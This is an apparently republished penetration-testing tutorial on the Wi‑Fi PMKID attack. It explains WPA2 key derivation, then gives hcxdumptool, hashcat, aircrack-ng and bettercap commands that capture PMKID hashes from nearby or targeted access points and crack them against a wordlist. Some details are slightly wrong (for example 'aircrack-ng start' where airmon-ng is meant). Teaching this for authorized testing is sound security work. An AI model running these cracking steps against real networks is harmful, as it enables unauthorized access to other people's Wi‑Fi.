Mastering the PMKID Attack: A Step‑by‑Step Guide to Wi‑Fi Penetration Testing

This article walks through the theory and practical exploitation of the Wi‑Fi PMKID attack, covering authentication basics, the WPA/WPA2 handshake, PMKID generation, and detailed step‑by‑step instructions using tools such as hcxdumptool, hashcat, aircrack‑ng, Airgeddon and bettercap to capture and crack PMKID hashes.

Black & White Path
Black & White Path
Black & White Path
Mastering the PMKID Attack: A Step‑by‑Step Guide to Wi‑Fi Penetration Testing

Open System Authentication

Open System Authentication (OSA) is the authentication process defined in the original WEP protocol, allowing a client to connect to any WEP network.

Client discovers SSID and sends a connection request.

AP returns a response.

Client sends an association or authentication request.

AP generates a session‑specific authentication code and sends it to the client.

Open System Authentication
Open System Authentication

Shared Key Authentication

Shared Key Authentication is a WEP authentication method that requires the client and the AP to share the same pre‑shared Wi‑Fi password.

Client discovers SSID and sends a connection request.

AP sends an encrypted file that can only be decrypted with the Wi‑Fi password.

Client enters the password and sends an authentication request frame.

AP validates the decrypted file and grants access if the key is correct.

Shared Key Authentication
Shared Key Authentication

WPA/WPA2 PSK Overview

The article focuses on WPA2‑PSK (pre‑shared key) authentication and the unicast mode between AP and client.

PSK is derived as:

PSK = PBKDF2_SHA1(Wi‑Fi password + SSID, SSID length, 4096 iterations)

In WPA2‑PSK the pre‑shared key is the Pairwise Master Key (PMK). The actual traffic encryption key is derived from the PMK.

PTK = PMK + Anonce + Snonce + MAC(AP) + MAC(Supplicant)

Authenticator = AP

Supplicant = Client

Anonce = AP‑generated random nonce per packet

Snonce = Client‑generated random nonce per packet

For broadcast/multicast the keys become GTK and GMK, derived from the master session key.

Four‑Way Handshake

The four‑way handshake converts source key material into data‑encryption material.

Both client and AP know the PMK, but the PMK itself is not used directly for encrypting data; a PTK is derived from it.

Handshake steps (simplified):

AP sends Anonce; client generates PTK using PMK, MAC addresses, Anonce and its own Snonce.

Client returns Snonce; AP generates the same PTK and includes a MIC field set to 1.

AP derives GTK from GMK, encrypts it with PTK, and sends it to the client.

Client confirms key installation.

Four‑Way Handshake
Four‑Way Handshake

PMK Cache and PMKID

After a successful handshake, the AP and client maintain a PMK Security Association (PMKSA) cache.

PMKSA = PMKID + PMK lifetime + MAC addresses + other variables.

PMKID = HMAC‑SHA1‑128(PMK, "PMK Name" + MAC(AP) + MAC(Supplicant))

The router stores the PMKID; on subsequent connections it can validate the PMKID instead of performing the full handshake, reducing roaming latency.

PMKID Attack Principle

Only routers with roaming enabled expose the PMKID vulnerability.

Attack flow:

Capture PMKID → guess Wi‑Fi password with a dictionary → derive PMK → compute PMKID → compare with captured PMKID.

Wi‑Fi password (guessed)

Wi‑Fi SSID (known)

SSID length (known)

MAC addresses of AP and client (known)

PMK Name string (known)

Hashcat lists the following advantages for the PMKID attack:

No legitimate client needed ("no‑client" attack).

No need to wait for a full four‑way handshake.

Avoids retransmission issues of EAPOL frames.

Unaffected by client password entry errors.

Works even when the client is out of range.

Faster because fixed nonces and replay counters are not required.

Produces a simple hexadecimal hash string, no special capture formats needed.

Capturing PMKID with hcxdumptool

Install the required tools and put the Wi‑Fi adapter into monitor mode:

apt install hcxtools
aircrack-ng start wlan0

Capture PMKID frames from all surrounding APs:

hcxdumptool -o demo -i wlan0mon --enable_status 5

Option --enable_status 5 shows only authentication and EAP/EAPOL frames; PMKID can also be captured with status 1.

Using hcxdumptool to capture PMKID
Using hcxdumptool to capture PMKID

Converting and Cracking with hashcat

Convert the captured pcapng file to a hashcat‑compatible hash: hcxpcaptool -z hash demo Rename the output to pmkidhash and run hashcat:

hashcat -m 16800 --force hash /usr/share/wordlists/rockyou.txt --show
hashcat cracking PMKID
hashcat cracking PMKID
hashcat cracking result
hashcat cracking result

Targeted Capture of a Single AP

Record the target AP’s MAC address in a file named target. Then capture only that AP’s PMKID:

hcxdumptool -o raj -i wlan0mon --enable_status=1 --filterlist_ap=target --filtermode=2

Convert and crack as before:

hcxpcaptool -z pmkidhash raj
hashcat -m 16800 --force pmkidhash /usr/share/wordlists/rockyou.txt --show
Using filterlist_ap parameter
Using filterlist_ap parameter
PMKID capture success
PMKID capture success

Alternative Tools: aircrack‑ng , Airgeddon, bettercap

Convert the pcapng file to pcap and crack directly with aircrack‑ng:

file demo
tcpdump -r demo -w demo.pcap
aircrack-ng demo.pcap -w /usr/share/wordlists/rockyou.txt
aircrack‑ng cracking success
aircrack‑ng cracking success

Airgeddon provides a menu‑driven CLI that automates the entire PMKID capture and cracking workflow with a few numeric selections.

Using bettercap (after installing an older libpcap version) the steps are:

wget http://old.kali.org/kali/pool/main/libp/libpcap/libpcap0.8_1.9.1-4_amd64.deb
dpkg -i libpcap0.8_1.9.1-4_amd64.deb
bettercap
set wifi.interface wlan0mon
wifi.recon on
wifi.show
wifi.assoc 68:14:01:5a:0e:9c
bettercap scanning AP
bettercap scanning AP

Captured PMKID is saved to /root/bettercap-wifi-handshakes.pcap. Convert and crack with hashcat as shown earlier.

bettercap cracking PMKID
bettercap cracking PMKID

Conclusion

The PMKID attack poses a serious threat to both home and enterprise Wi‑Fi networks because it can be performed without a legitimate client and without capturing a full four‑way handshake. Using strong passwords and migrating to WPA3 are essential mitigations.

Original Source

Signed-in readers can open the original source through BestHub's protected redirect.

Sign in to view source
Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactadmin@besthub.devand we will review it promptly.

Wi-Fi securityPenetration Testinghashcataircrack-ngbettercaphcxdumptoolPMKID
Black & White Path
Written by

Black & White Path

We are the beacon of the cyber world, a stepping stone on the road to security.

0 followers
Reader feedback

How this landed with the community

Sign in to like

Rate this article

Was this worth your time?

Sign in to rate
Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.